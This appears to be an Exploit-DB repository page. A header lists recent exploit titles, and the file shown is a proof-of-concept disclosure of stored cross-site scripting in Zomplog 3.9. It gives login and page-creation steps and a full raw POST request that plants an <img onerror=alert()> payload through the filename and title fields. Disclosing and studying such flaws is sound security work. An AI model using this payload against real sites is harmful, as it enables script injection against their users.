c18d9953a2
22 changes to exploits/shellcodes/ghdb Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities Joomla HikaShop 4.7.4 - Reflected XSS Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS mooDating 1.2 - Reflected Cross-site scripting (XSS) October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated) PaulPrinting CMS - (Search Delivery) Cross Site Scripting Perch v3.2 - Persistent Cross Site Scripting (XSS) RosarioSIS 10.8.4 - CSV Injection WordPress Plugin AN_Gradebook 5.0.1 - SQLi Zomplog 3.9 - Cross-site scripting (XSS) zomplog 3.9 - Remote Code Execution (RCE) copyparty 1.8.2 - Directory Traversal copyparty v1.8.6 - Reflected Cross Site Scripting (XSS) GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
43 lines
No EOL
1.3 KiB
Text
43 lines
No EOL
1.3 KiB
Text
Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
|
|
Application: Zomplog
|
|
Version: v3.9
|
|
Bugs: XSS
|
|
Technology: PHP
|
|
Vendor URL: http://zomp.nl/zomplog/
|
|
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
|
|
Date of found: 22.07.2023
|
|
Author: Mirabbas Ağalarov
|
|
Tested on: Linux
|
|
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
steps:
|
|
1. Login to account
|
|
2. Add new page
|
|
3. Set as <img src=x onerror=alert(4)>
|
|
4. Go to menu
|
|
|
|
Poc request:
|
|
|
|
POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 11
|
|
sec-ch-ua:
|
|
Accept: */*
|
|
Content-Type: application/x-www-form-urlencoded
|
|
X-Requested-With: XMLHttpRequest
|
|
sec-ch-ua-mobile: ?0
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
|
|
sec-ch-ua-platform: ""
|
|
Origin: http://localhost
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Dest: empty
|
|
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
|
|
Connection: close
|
|
|
|
empty=empty |